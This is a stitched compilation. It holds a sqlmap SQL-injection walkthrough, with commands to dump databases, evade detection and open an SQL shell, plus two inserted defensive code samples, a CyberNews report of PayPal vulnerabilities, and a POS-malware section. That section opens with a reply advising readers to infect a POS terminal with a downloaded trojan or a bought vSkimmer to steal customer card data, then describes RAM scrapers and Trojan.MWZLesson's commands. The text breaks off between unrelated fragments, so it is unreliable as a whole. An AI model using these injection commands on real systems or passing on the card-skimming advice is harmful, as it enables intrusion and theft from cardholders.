UNION query SQL injection. The classic version of SQL injection, when an expression starting with “UNION ALL SELECT” is passed to the vulnerable parameter. This technique works when web applications directly return the output of the SELECT command to the page: using a for loop or similar, so that each record of the retrieved database selection is sequentially output to the page. Sqlmap can also exploit the situation when only the first record from the selection is returned (Partial UNION query SQL injection).

Error-based SQL injection. In the case of this attack, the scanner replaces or adds a syntactically incorrect expression to the vulnerable parameter, after which it parses the HTTP response (headers and body) in search of DBMS errors, which would contain a previously known injected sequence of characters and, somewhere “nearby”, the output of the subquery we want. This technique only works when the web application for some reason (most often for debugging purposes) exposes DBMS errors.

Stacked queries SQL injection.
The scanner checks if the web application supports sequential requests and, if it does, adds a semicolon (;) to the vulnerable HTTP request parameter, followed by an injected SQL request. This technique is mainly used to inject non-SELECT SQL commands, such as manipulating data (using INSERT or DELETE). It is noteworthy that the technique can potentially lead to the ability to read / write from the file system, as well as the execution of commands in the OS. However, this depends on the database management system used as the back-end, as well as user privileges.

Boolean-based blind SQL injection. Implementation of the so-called blind injection: data from the database in a "pure" form are not returned anywhere by a vulnerable web application. The technique is also called deductive. Sqlmap adds a syntactically well-formed expression containing a SELECT subquery (or any other command to retrieve a selection from the database) to the vulnerable HTTP request parameter. For each HTTP response received, the headers / body of the page is compared with the response to the original request, so the utility can determine the output of the embedded SQL statement character by character. Alternatively, the user can supply a string or regular expression to define "true" pages (hence the name of the attack). The binary search algorithm implemented in sqlmap to perform this technique is capable of retrieving each character in the output with a maximum of seven HTTP requests.

Time-based blind SQL injection. Completely blind injection. Just like in the previous case, the scanner plays with the vulnerable parameter. But in this case, it adds a subquery that causes the DBMS to pause for a specified number of seconds (for example, using the SLEEP() or BENCHMARK() commands). Using this feature, the scanner can retrieve data from the database character by character, comparing the response time to the original request and to the request with the embedded code.
It also uses a binary search algorithm. In addition, a special method for data verification is applied to reduce the likelihood of incorrect character extraction due to unstable connection.

Despite the fact that the scanner is able to automatically exploit the found vulnerabilities, you need to understand in detail each of the techniques used. If the topic of SQL injection is still familiar to you only on your fingers, I recommend flipping through the ][ archive or read Dmitry Evteev's manual "SQL Injection: From A to Z". It is also important to understand that attack implementations are often very different for different DBMSs. Sqlmap is able to handle all these cases and currently supports MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB.

Remember that before we learned how to use NetSparker? If Netsparker finds at least one SQL injection, then SQLmap will allow it to be exploited.

I got bored with conventional injections, so I suggest considering Blind Injection to make it more interesting. We will not search for a long time - we will take the link from the site that we crawled earlier. Netsparker Test Web Site - PHP

By the way, when installing python, there is a clause that adds the python executable file to path, so as not to write the path to it every time. I am still a fruit and for my fruit reasons I will not do this. Just because I'm not looking for easy ways. But in fact, I just realized that I fucked up, and I am writing this paragraph at the end of the article.

Now we open the command line. I installed python on the C drive. Next to python I also installed sqlmap. Now we need to check if everything works. To do this, use the CD command to go to the root:

CD C:\

To run the utility, you first need to register the path to the python executable file: Python27\Python.exe, and then, separated by a space, the path to the utility itself: SQLmap\sqlmap.py and press Enter.
Don't copy SQLmap to python folder!

Don't worry, this error is caused by a "blank" startup. Let's check one of the proposed options. Use -h to get a list of commands. Press Enter again (this time to continue), and enter:

Python27\Python.exe SQLmap\sqlmap.py -h

Everything is working.

To get started, you need to use the -u option. It is used to indicate an attacked link. The correct command would look like this:

Python27\Python.exe SQLmap\sqlmap.py -u Netsparker Test Web Site - PHP

It is necessary to follow the whole process, since the program may ask us how to proceed next: Usually we are asked a simple yes or no. To answer yes - enter Y or y, otherwise - N or n. The capital letter in the question means the default choice, and if you are too lazy to press two buttons, you can press one - Enter, and the program will continue working with the default choice. What? Are you too lazy? Okay. To make the program act at its own discretion, we use --batch. Please note, two hyphens. We add this option to the end of the command:

Python27\Python.exe SQLmap\sqlmap.py -u http://php.testsparker.com/artist.php?id=test --batch

It remains to wait for the program to finish. She herself will inform you about the completion of the work, and provide the found material.

To get a list of databases - use the --dbs option.

You can find out what exactly the program does and what methods it uses by reading the log of work.

And since this is a blind injection, the utility will gradually, by letter, recognize the names of all bases. A great and illustrative example of working with blind injection. To do it manually, you would have quit in the second minute of work.

When working with other resources, the utility can stop its work, reporting the expired timeout: “connection timed out to the target URL”. With this, your target will work and open quietly in the browser. The problem is that some resources recognize the SQLmap and disconnect with it.
To avoid this problem, I advise you to use the --random-agent function. Thus, we disguise ourselves and continue working:

Python27\Python.exe SQLmap\sqlmap.py -u http://php.testsparker.com/artist.php?id=test --random-agent --dbs

Ok, we've got a list of all databases, and now we need to get their contents. Our proud --dbs turns into a simple -D, after which we enter the name of the database we are interested in. In my case, this is mysql. To get the tables, add --tables to the very end.

Python27\Python.exe SQLmap\sqlmap.py -u http://php.testsparker.com/artist.php?id=test --random-agent -D mysql --tables --batch

Since this is a blind injection, we also have to wait for all the data to be received. Yes, for a long time, but how else? The utility found a lot of tables. To get the columns, we use the same system as with obtaining tables, only change --tables to -T, enter the required tables and then add --columns:

Python27\Python.exe SQLmap\sqlmap.py -u http://php.testsparker.com/artist.php?id=test --random-agent -D mysql -T proc --columns --batch

Yes, we have to wait again. It was necessary to study in advance the insides of the target for the article. It takes only a couple of seconds for you, and I'm sitting here with tea, I've been waiting for an hour.

I've been waiting for the fifth hour, so I just scored and left to work with another database of logs. Everything is the same, only the names of the bases and tables are different:

Python27\Python.exe SQLmap\sqlmap.py -u http://php.testsparker.com/artist.php?id=test --random-agent -D logs -T logs --columns --batch

Finally! We got a list of columns. Now, to get their contents, we do the following: --columns evolves (or degrades, as it is more convenient for anyone) into -C, enter the columns / columns we are interested in separated by commas and add the --dump key to the end.
Python27\Python.exe SQLmap\sqlmap.py -u http://php.testsparker.com/artist.php?id=test --random-agent -D logs -T logs -C IP,useragent --dump --batch

After that, the program starts merging data: I will have to wait a very long time to show the finished result, so I'll show you how the dump will look in someone else's example: The problem is the time it will take for the blind injection.

In principle, that's all. But specifically, as an addition, I will show a couple of chips. For example, how about the server executing our commands? For this we need to create a wrapper. For this we will use the --sql-shell command:

Python27\Python.exe SQLmap\sqlmap.py -u http://php.testsparker.com/artist.php?id=test --sql-shell

It does not always work, but if we are successful, we get full access, and we can even add our own users. For example, let's try to get the user with the SELECT user() command. To execute this command, we just need to write it directly into the command line. SQLmap has already created a wrapper and is ready to send our commands for execution. Let's try: Voilà. I will not explain the usefulness of this function, it seems obvious to me. And to get out of this mode - enter x or q. If you want to use CMD, it is easier to do it in Netsparker if there is a similar vulnerability.

In addition, I am obliged to tell you how to attack the vulnerability if the data is transmitted by the POST parameter. If in Netsparker you see a message that this is a POST SQL Injection, then by clicking on it in the sparker, in the working window find the name of the variable being passed (TYPE) and its value (VALUE), then simply substitute these values into sqlmap:

Python27\Python.exe SQLmap\sqlmap.py -u Netsparker Test Web Site - PHP --data "username=admin&password=admin123456"

then everything is the same.

You can also use Burp Suite to parse POST injections.
You can do without this program, but more on that later, but this tool is very interesting and we must put in at least a word for it. After installation and launch, we will be asked to select a project. We will not create anything, and therefore we will select a temporary one and click further: We will use the default settings for this project, the standard ones: Click on start and wait for the program to open.

Immediately after opening the program, we go to the proxy settings menu: Now I will immediately show you how to add your own, but we will add a little specific. Click on the Add button. After that, set up everything like mine and click OK: We will use our new proxy. To do this, go to the browser settings. Since I use Firefox (and I advise you), then the proxy setting is in my "Network Settings". We manually configure the proxies that we introduced in Burp Suite.

Before accepting the settings, open the login data entry form separately: http://php.testsparker.com/auth/internal.php. After that, we accept the settings, enter the data and click on the login button. The page will load, but we do not need this process, but the data that is in Burp Suite: We only need one line. Input line:

username=admin+&password=admin123456&token=11940

To work with this data in SQLmap, we will use the --data option:

Python27\Python.exe SQLmap\sqlmap.py -u http://php.testsparker.com/auth/internal.php --random-agent --data "username=admin+&password=admin123456&token=11940" --dbs --batch

In our case, the injection failed. However, I explained how to use POST in SQLmap to attack.

As I promised, I will tell you how to catch POST immediately in the browser. For this we need to open the page where we will enter the login and password, and open the console with the F12 key. Next, we need to open the Network tab and check the Continuous logs item. After that, we enter the data on the site and start looking for our POST request in the logs.
To get the data we need - click on the request we need and in the menu on the right, select the “parameters” tab. In the parameters there is an item "payload", which contains the string we need.

My task is to consider the main functions, and separately and completely the SQLmap utility needs to be disassembled and considered in a new, separate article. This article is already painfully long and loaded. I think I'll analyze it in a future article as well as Netsparker in this one.

The article has come to an end. I will not hide, most of the effort went to Netsparker. The reason for this is the lack of such material in Russian. There are short descriptions, but no full analysis. I decided to change the situation by writing a full analysis of the functions of this product. The fact is that on the same SQLmap you will find hundreds, if not thousands of articles and full analyzes of all functions, commands, and even examples of successful attacks. But you will hardly find a complete analysis of Netsparker.

On my own behalf, I want to add that professionals reading this material do not throw rotten tomatoes at me. I really tried.

Good luck. Take care of yourself, do not break the law and remember that you can scan other people's resources only with the permission of their owners. Nevertheless, the utilities described by us will allow you to conduct an excellent pen test of even the most complex application.

(c) cybersec.org
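The walkthrough above notes that some sites recognize sqlmap and that --random-agent hides it, so on the defending side a User-Agent match alone misses such runs. The following is an added example, not part of the original post: a Python access-log check that flags the UNION, stacked, boolean-blind and time-based request patterns described above, grouped per source and parameter. The log lines, addresses and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample in Apache/nginx "combined" format. Addresses come from
# documentation ranges; the requests are illustrative, not captured traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Mar/2024:10:00:01 +0000] "GET /artist.php?id=test HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0"
198.51.100.7 - - [10/Mar/2024:10:00:09 +0000] "GET /search.php?q=union+square+select+hotels HTTP/1.1" 200 2210 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0"
203.0.113.5 - - [10/Mar/2024:10:01:00 +0000] "GET /artist.php?id=test%27%20AND%20(SELECT%201)%3D1--%20 HTTP/1.1" 200 5120 "-" "sqlmap/1.x (constructed)"
203.0.113.5 - - [10/Mar/2024:10:01:01 +0000] "GET /artist.php?id=test%27%20AND%20SLEEP(5)--%20 HTTP/1.1" 200 5120 "-" "sqlmap/1.x (constructed)"
203.0.113.9 - - [10/Mar/2024:10:02:00 +0000] "GET /artist.php?id=test%27%20AND%20(SELECT%201)%3D1--%20 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0"
203.0.113.9 - - [10/Mar/2024:10:02:01 +0000] "GET /artist.php?id=test%27%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 HTTP/1.1" 200 5301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0"
203.0.113.9 - - [10/Mar/2024:10:02:02 +0000] "GET /artist.php?id=test%27%20AND%20SLEEP(5)--%20 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0"
203.0.113.9 - - [10/Mar/2024:10:02:08 +0000] "GET /artist.php?id=test%27%3B%20INSERT%20INTO%20t%20VALUES%20(1)--%20 HTTP/1.1" 500 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0"
"""

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# One indicator per injection class named in the article. Error-based probes
# are syntactically broken on purpose and are better caught from 5xx bursts.
TECHNIQUES = [
    ("union", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("time-blind", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("stacked", re.compile(r";\s*(insert|delete|update|select)\b", re.I)),
    ("boolean-blind", re.compile(r"\b(and|or)\b.{0,40}\(\s*select\b", re.I)),
]


def classify(value):
    """Return the technique names whose indicator matches a decoded value."""
    return [name for name, rx in TECHNIQUES if rx.search(value)]


def ua_only(log_text):
    """Naive check: source IPs whose User-Agent literally names sqlmap."""
    hits = set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and "sqlmap" in m["ua"].lower():
            hits.add(m["ip"])
    return hits


def analyze(log_text, min_hits=2):
    """Group suspicious parameter values by (source IP, path, parameter)."""
    stats = defaultdict(
        lambda: {"hits": 0, "techniques": set(), "ua_names_sqlmap": False}
    )
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        # parse_qsl percent-decodes, so the indicators see the real payload
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            found = classify(value)
            if not found:
                continue
            entry = stats[(m["ip"], url.path, name)]
            entry["hits"] += 1
            entry["techniques"].update(found)
            entry["ua_names_sqlmap"] |= "sqlmap" in m["ua"].lower()
    return {k: v for k, v in stats.items() if v["hits"] >= min_hits}


if __name__ == "__main__":
    print("User-Agent check only:", sorted(ua_only(SAMPLE_LOG)))
    for (ip, path, param), info in sorted(analyze(SAMPLE_LOG).items()):
        print(ip, path, param, info["hits"], sorted(info["techniques"]),
              "sqlmap UA" if info["ua_names_sqlmap"] else "browser-like UA")
```

Access logs record only the query string, so the POST case the article drives with --data needs request-body logging at the application or WAF before the same check can see it.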
  5. Vulnerabilities we discovered

In our analysis of PayPal’s mobile apps and website UI, we were able to uncover a series of significant issues. We’ll explain these vulnerabilities from the most severe to least severe, as well as how each vulnerability can lead to serious issues for the end user.

#1 Bypassing PayPal’s two-factor authentication (2FA)

Using the current version of PayPal for Android (v. 7.16.1), the CyberNews research team was able to bypass PayPal’s phone or email verification, which for ease of terminology we can call two-factor authentication (2FA). Their 2FA, which is called “Authflow” on PayPal, is normally triggered when a user logs into their account from a new device, location or IP address.

How we did it

In order to bypass PayPal’s 2FA, our researcher used the PayPal mobile app and a MITM proxy, like Charles proxy. Then, through a series of steps, the researcher was able to get an elevated token to enter the account. (Since the vulnerability hasn’t been patched yet, we can’t go into detail of how it was done.) The process is very simple, and only takes seconds or minutes. This means that attackers can gain easy access to accounts, rendering PayPal’s lauded security system useless.

What’s the worst case scenario here?

Stolen PayPal credentials can go for just $xx.xx on the black market. Essentially, it’s exactly because it’s so difficult to get into people’s PayPal accounts with stolen credentials that these stolen credentials are so cheap. PayPal’s authflow is set up to detect and block suspicious login attempts, usually related to a new device or IP, besides other suspicious actions.

But with our 2FA bypass, that security measure is null and void. Hackers can buy stolen credentials in bulk, log in with those credentials, bypass 2FA in minutes, and have complete access to those accounts.
With many known and unknown stolen credentials on the market, this is potentially a huge loss for many PayPal customers.

PayPal’s response

We’ll assume that HackerOne’s response is representative of PayPal’s response. For this issue, PayPal decided that, since the user’s account must already be compromised for this attack to work, “there does not appear to be any security implications as a direct result of this behavior.” Based on that, they closed the issue as Not Applicable, costing us 5 reputation points in the process.

#2 Phone verification without OTP

Our analysts discovered that it’s pretty easy to confirm a new phone without an OTP (One-Time Pin). PayPal recently introduced a new system where it checks whether a phone number is registered under the same name as the account holder. If not, it rejects the phone number.

How we did it

When a user registers a new phone number, an onboard call is made to api-m.paypal.com, which sends the status of the phone confirmation. We can easily change this call, and PayPal will then register the phone as confirmed. The call can be repeated on already registered accounts to verify the phone.

What’s the worst case scenario here?

Scammers can find lots of uses for this vulnerability, but the major implication is unmissable. By bypassing this phone verification, it will make it much easier for scammers to create fraudulent accounts, especially since there’s no need to receive an SMS verification code.

PayPal’s response

Initially, the PayPal team via HackerOne took this issue more seriously. However, after a few exchanges, they stopped responding to our queries, and recently PayPal itself (not the HackerOne staff) locked this report, meaning that we aren’t able to comment any longer.

#3 Sending money security bypass

PayPal has set up certain security measures in order to help avoid fraud and other malicious actions on the tool.
One of these is a security measure that’s triggered when one of the following conditions, or a combination of these, is met:
  • You’re using a new device
  • You’re trying to send payments from a different location or IP address
  • There’s a change in your usual sending pattern
  • The owning account is not “aged” well (meaning that it’s pretty new)

When these conditions are met, PayPal may throw up a few types of errors to the users, including:
  • “You’ll need to link a new payment method to send the money”
  • “Your payment was denied, please try again later”

How we did it

Our analysts found that PayPal’s sending money security block is vulnerable to brute force attacks.

What’s the worst case scenario here?

This is similar in impact to Vulnerability #1 mentioned above. An attacker with access to stolen PayPal credentials can access these accounts after easily bypassing PayPal’s security measure.

PayPal’s response

When we submitted this to HackerOne, they responded that this is an “out-of-scope” issue since it requires stolen PayPal accounts. As such, they closed the issue as Not Applicable, costing us 5 reputation points in the process.

#4 Full name change

By default, PayPal allows users to only change 1-2 letters of their name once (usually because of typos). After that, the option to update your name disappears.

However, using the current version of PayPal.com, the CyberNews research team was able to change a test account’s name from “Tester IAmTester” to “christin christina”.

How we did it

We discovered that if we capture the requests and repeat it every time by changing 1-2 letters at a time, we are able to fully change account names to something completely different, without any verification.

We also discovered that we can use any unicode symbols, including emojis, in the name field.

What’s the worst case scenario here?

An attacker, armed with stolen PayPal credentials, can change the account holder’s name.
Once they’ve completely taken over an account, the real account holder wouldn’t be able to claim that account, since the name has been changed and their official documents would be of no assistance.

PayPal’s response

This issue was deemed a Duplicate by PayPal, since it had been apparently discovered by another researcher.

#5 The self-help SmartChat stored XSS vulnerability

PayPal’s self-help chat, which it calls SmartChat, lets users find answers to the most common questions. Our research discovered that this SmartChat integration is missing crucial form validation that checks the text that a person writes.

How we did it

Because the validation is done at the front end, we were able to use a man in the middle (MITM) proxy to capture the traffic that was going to PayPal servers and attach our malicious payload.

What’s the worst case scenario here?

Anyone can write malicious code into the chatbox and PayPal’s system would execute it. Using the right payload, a scammer can capture customer support agent session cookies and access their account.

With that, the scammer can log into their account, pretend to be a customer support agent, and get sensitive information from PayPal users.

PayPal’s response

The same day that we informed PayPal of this issue, they replied that since it isn’t “exploitable externally,” it is a non-issue. However, while we planned to send them a full POC (proof of concept), PayPal seems to have removed the file on which the exploit was based. This indicates that they were not honest with us and patched the problem quietly themselves, providing us with no credit, thanks, or bounty.
Instead, they closed this as Not Applicable, costing us another 5 points in the process.

#6 Security questions persistent XSS

This vulnerability is similar to the one above (#5), since PayPal does not sanitize its Security Questions input.

How we did it

Because PayPal’s Security Questions input box is not validated properly, we were able to use the MITM method described above.

Here is a screenshot that shows our test code being injected to the account after refresh, resulting in a massive clickable link:

What’s the worst case scenario here?

Attackers can inject scripts to other people’s accounts to grab sensitive data. By using Vulnerability #1 and logging in to a user’s account, a scammer can inject code that can later run on any computer once a victim logs into their account.

This includes:

  • Showing a fake pop up that could say “Download the new PayPal app” which could actually be malware.
  • Changing the text user is adding. For example, the scammer can alter the email where the money is being sent.
  • Keylogging credit card information when the user inputs it.

There are many more ways to use this vulnerability and, like all of these exploits, it’s only limited by the scammer’s imagination.

PayPal’s response

The same day we reported this issue, PayPal responded that it had already been reported. Also on the same day, the vulnerability seems to have been patched on PayPal’s side. They deemed this issue a Duplicate, and we lost another 5 points.

PayPal’s reputation for dishonesty

PayPal has been on the receiving end of criticism for not honoring its own bug bounty program.

Most ethical hackers will remember the 2013 case of Robert Kugler, the 17-year-old German student who was shafted out of a huge bounty after he discovered a critical bug on PayPal’s site.
Kugler notified PayPal of the vulnerability on May 19, but apparently PayPal told him that because he was under 18, he was ineligible for the Bug Bounty Program.

But according to PayPal, the bug had already been discovered by someone else, but they also admitted that the young hacker was just too young.

Another researcher earlier discovered that attempting to communicate serious vulnerabilities in PayPal’s software led to long delays. At the end, and frustrated, the researcher promises to never waste his time with PayPal again.

There’s also the case of another teenager, Joshua Rogers, also 17 at the time, who said that he was able to easily bypass PayPal’s 2FA. He went on to state, however, that PayPal didn’t respond after multiple attempts at communicating the issue with them.

PayPal acknowledged and downplayed the vulnerability, later patching it, without offering any thanks to Rogers.

The big problem with HackerOne

HackerOne is often hailed as a godsend for ethical hackers, allowing companies to get novel ways to patch up their tools, and allowing hackers to get paid for finding those vulnerabilities.

It’s certainly the most popular, especially since big names like PayPal work exclusively with the platform. There have been issues with HackerOne’s response, including the huge scandal involving Valve, when a researcher was banned from HackerOne after trying to report a Steam zero-day.

However, its Triage system, which is often seen as an innovation, actually has a serious problem. The way that HackerOne’s triage system works is simple: instead of bothering the vendor (HackerOne’s customer) with each reported vulnerability, they’ve set up a system where HackerOne Security Analysts will quickly check and categorize each reported issue and escalate or close the issues as needed. This is similar to the triage system in hospitals.

These Security Analysts are able to identify the problem, try to replicate it, and communicate with the vendor to work on a fix.
However, there’s one big flaw here: these Security Analysts are also active Bug Bounty Hackers.

Essentially, these Security Analysts get first dibs on reported vulnerabilities. They have full discretion on the type of severity of the issue, and they have the power to escalate, delay or close the issue.

That presents a huge opportunity for them, if they act in bad faith. Other criticisms have pointed out that Security Analysts can first delay the reported vulnerability, report it themselves on a different bug bounty platform, collect the bounty (without disclosing it of course), and then close the reported issue as Not Applicable, or perhaps Duplicate.

As such, the system is ripe for abuse, especially since Security Analysts on HackerOne use generic usernames, meaning that there’s no real way of knowing what they are doing on other bug bounty platforms.

What it all means

All in all, the exact “Who is to blame” question is left unanswered at this point, because it is overshadowed by another bigger question: why are these services so irresponsible?

Let’s point out a simple combination of vulnerabilities that any malicious actor can use:

  • Buy PayPal accounts on the black market for pennies on the dollar. (On this .onion website, you can buy a $5,000 PayPal account for just $150, giving you a 3,333% ROI.)
  • Use Vulnerability #1 to bypass the two-factor authentication easily.
  • Use Vulnerability #3 to bypass the sending money security and easily send money from the linked bank accounts and cards.

Alternatively, the scammer can use Vulnerability #1 to bypass 2FA and then use Vulnerability #4 to change the account holder’s name.
That way, the scammer can lock the original owner out of their own account.

While these are just two simple ways to use our discovered vulnerabilities, scammers – who have much more motivation and creativity for maliciousness (as well as a penchant for scalable attacks) – will most likely have many more ways to use these exploits.

And yet, to PayPal and HackerOne, these are non-issues. Even worse, it seems that you’ll just get punished for reporting it.
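The full name change in #4 above works when each request is judged only against the name currently on file. The following is an added example, not part of the original post and not PayPal's or CyberNews's code: it puts that per-request check beside a server-side check that measures against the originally verified name, counts changes, and rejects emoji and symbols. The account model, the limits and the sample names are constructed assumptions.

```python
import unicodedata

MAX_EDITS = 2     # the post: users may change "1-2 letters"
MAX_CHANGES = 1   # the post: the change is allowed "once"


def levenshtein(a: str, b: str) -> int:
    """Edit distance (insert/delete/substitute), row-by-row dynamic programming."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def normalize(name: str) -> str:
    """NFKC-fold compatibility characters and collapse runs of whitespace."""
    return " ".join(unicodedata.normalize("NFKC", name).split())


def charset_ok(name: str) -> bool:
    """Accept letters and combining marks from any script plus a few separators."""
    return bool(name) and all(
        unicodedata.category(ch)[0] in "LM" or ch in " -'.\u2019" for ch in name
    )


class Account:
    """Hypothetical account record; verified_name is fixed at identity verification."""

    def __init__(self, verified_name: str):
        self.verified_name = normalize(verified_name)
        self.display_name = self.verified_name
        self.changes_used = 0


def naive_update(acct: Account, new_name: str):
    """Flawed check: compares with the *current* name and keeps no server-side
    count, so a replayed request can drift the name two letters at a time."""
    new_name = normalize(new_name)
    if levenshtein(acct.display_name.casefold(), new_name.casefold()) > MAX_EDITS:
        return (False, "distance")
    acct.display_name = new_name
    return (True, "ok")


def hardened_update(acct: Account, new_name: str):
    """Server-side check: character set, change counter, and distance measured
    against the verified baseline rather than the last accepted value."""
    new_name = normalize(new_name)
    if not charset_ok(new_name):
        return (False, "charset")
    if acct.changes_used >= MAX_CHANGES:
        return (False, "limit")
    if levenshtein(acct.verified_name.casefold(), new_name.casefold()) > MAX_EDITS:
        return (False, "distance")
    acct.display_name = new_name
    acct.changes_used += 1
    return (True, "ok")


# Constructed sequence: every step is two letters away from the previous one.
STEPS = ["Bon Lee", "Bob Ree", "Bob Ray"]


def replay(update, acct: Account, names) -> int:
    """Submit each name in order; return how many requests were accepted."""
    return sum(1 for n in names if update(acct, n)[0])


if __name__ == "__main__":
    for label, fn in (("naive", naive_update), ("hardened", hardened_update)):
        acct = Account("Ann Lee")
        accepted = replay(fn, acct, STEPS)
        print(f"{label}: accepted {accepted} of {len(STEPS)}, name on file: {acct.display_name}")
```
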
  6. Hello, this is a very interesting and relevant topic for successful work.

To get data from your POS terminal, you can use the following methods:

1. Download a free topical virus from a virus storage site and infect your POS terminal. Configure and study the transfer of customer data from your device to a computer or mobile phone. Sites where you can download Trojan viruses are listed in the next topic.

2. Buy a working vSkimmer and install it in your POS terminal. Set up data transfer to your device.

Some additional information:

POS terminal infection

Infection of POS terminals (Point Of Sale - point of sale), hardware and software systems for trading or automated workstations of a cashier is a cybercriminal activity aimed at stealing bank card data and further withdrawing funds.

Classification of methods of infecting POS terminals

Malicious programs for POS terminals can be distinguished by the volume of tasks being solved and the nature of the information stolen.

RAM scrapers

Writing the contents of RAM is a mandatory part of almost all programs for infecting POS terminals, since during a transaction all data from a bank card is processed in RAM. Basic RAM scrapers record information from memory and send it to the attacker's server for further offline analysis, while more advanced versions are able to independently extract data from the magnetic stripes of bank cards from the general stream.

RAM scraper and keylogger

Such programs, in addition to analyzing the RAM, also record all keystrokes, fixing PIN codes and other entered information. Since all transactions are carried out via a computer or mobile device, the development of malicious code often does not take place from scratch: cybercriminals modify already created Trojans and viruses by adding RAM scrapers to them to steal data from bank cards. Accordingly, such instances may contain rootkits to hide traces of activity or backdoors for remote access, and steal other information.
In particular, the well-known malicious agent vSkimmer collects information about the operating system used, users, and GUID.

Object of influence

When it comes to infecting POS terminals, malware is not injected into the card reader, but into the computer or mobile device that controls it. Although all transmitted transaction data is encrypted, the information from the magnetic stripe of the card arrives in unencrypted form and is already encrypted on the computer.

Evolution of POS malware

This vulnerability is used by criminals. The programs for scanning the RAM, embedded in the system, constantly analyze the contents of the latter and read the card data. The number, expiration date, owner's name, PIN-code, CVV and CVC recorded on the magnetic stripe are sufficient to make a clone with which you can withdraw money and pay for purchases. In addition, this data allows you to pay for online orders where the presentation of physical cards is not required. Chip cards are better protected: they encrypt payment information with a chip before being sent to the POS terminal, and intercepting it is useless. However, the magnetic stripe is also there, and its data can still be copied. In this case, the criminal will not be able to withdraw money from the ATM (there is no chip), but he will be able to use the clone as a means of payment if the reader in the store works only with a strip. However, in this case, traces remain for law enforcement agencies, and therefore criminals prefer to copy cards without chips.

Sources of threat

A POS terminal can be infected with malware in several ways: via the Internet using exploits, via a USB interface to which an infected medium is connected, by replacing a secure POS terminal with an infected one, via spam with a Trojan downloader. A program that steals passwords can be entered into the system on purpose.
Bank data is of great value, and an unscrupulous or offended employee, having agreed with a cybercriminal, will easily introduce a malicious agent into the system. The third major source of threat is companies that install and remotely service POS terminals. In theory, in such firms, the security system should be organized at the highest level, but in practice this is not always true. There are known cases when, having cracked the password of the remote administrator of POS terminals, attackers at once gained access to the banking data of millions of users.

Threat analysis

For a simple bank card holder, the main danger of POS-terminals being infected is that he is not able to prevent it. A person uses the card, assuming normal operation of the system, but if it performs unauthorized operations, then the user will not be able to find out about it. To reduce the risk, you can abandon the card, which contains only a magnetic stripe, in favor of a more secure chip one and regularly monitor the status of your accounts, track all transactions in order to immediately take action if any suspicions arise. If we talk about the owners of POS terminals, then from their point of view there are no direct losses: after all, the data is stolen not from the company, but from the cardholders. However, reputational losses and customer outflow can result in millions of damage, and therefore any company must take the necessary measures to protect the banking data of its customers.

All POS computers must be equipped with effective antivirus software, and the system software must be up to date. The list of installed programs itself should be limited, and the computer should not be used for other tasks not related to transactions. The same applies to the owners of mobile POS terminals. For such purposes, it is better to purchase a second smartphone, using it only to transfer money, and communicate, take selfies and other photos, launch media files - on another device.
Access to POS-terminals, authorization on them should be allowed only to those employees who directly work with them. Within the system, a clear delineation of rights is required with the prohibition to install or modify computer software for unprivileged accounts. Each user must have their own complex password.

Finally, in addition to working with the terminal, cashiers and other tellers should be trained in information security rules. As already mentioned, the methods of distributing malicious programs for trading devices do not differ from the methods of infecting other computers, and in many cases the penetration of Trojan horses and viruses is due to the carelessness and frivolity of users; compliance with cyber hygiene greatly complicates the activities of intruders.

Trojan.MWZLesson - a Trojan for POS terminals

For many years, POS terminals have remained a tasty morsel for virus writers, since they are used by numerous merchants around the world to make payments using bank plastic cards. Doctor Web's specialists examined another Trojan capable of infecting payment terminals, which turned out to be a modification of another malicious program well known to our virus analysts.

A POS Trojan added to the Dr.Web virus databases under the name Trojan.MWZLesson, after its launch, registers itself in the branch of the system registry responsible for starting applications. Its architecture includes a module that scans the RAM of the infected device for the presence of bank card tracks in it. The cybercriminals borrowed this code from another malicious program designed to infect POS terminals known as Trojan.PWS.Dexter. The Trojan transfers the detected tracks and other intercepted data to the command and control server.

Trojan.MWZLesson can intercept GET and POST requests sent from an infected machine by Mozilla Firefox, Google Chrome or Microsoft Internet Explorer - the Trojan duplicates these requests to the command and control server belonging to the attackers.
In addition, this malware can execute the following commands:

  • CMD - transfers the received directive to the CMD command interpreter;
  • LOADER - downloads and runs the file (dll - using the regsrv utility, vbs - using the wscript utility, exe - the direct launch is performed);
  • UPDATE - update command;
  • rate - sets the time interval of communication sessions with the management server;
  • FIND - search for documents by mask;
  • DDOS - start a DDoS attack using the http flood method.

Trojan.MWZLesson exchanges data with the control center via the HTTP protocol, while the packets that the Trojan sends to the remote server are not encrypted, but the malware uses a special cookie parameter in them, in the absence of which the C&C server ignores requests from the Trojan.

While studying the internal architecture of Trojan.MWZLesson, virus analysts from Doctor Web came to the conclusion that they were familiar with this Trojan, since they had encountered part of its code earlier in another malicious program. It turned out to be BackDoor.Neutrino.50, a truncated and shortened version of which, in fact, is Trojan.MWZLesson.

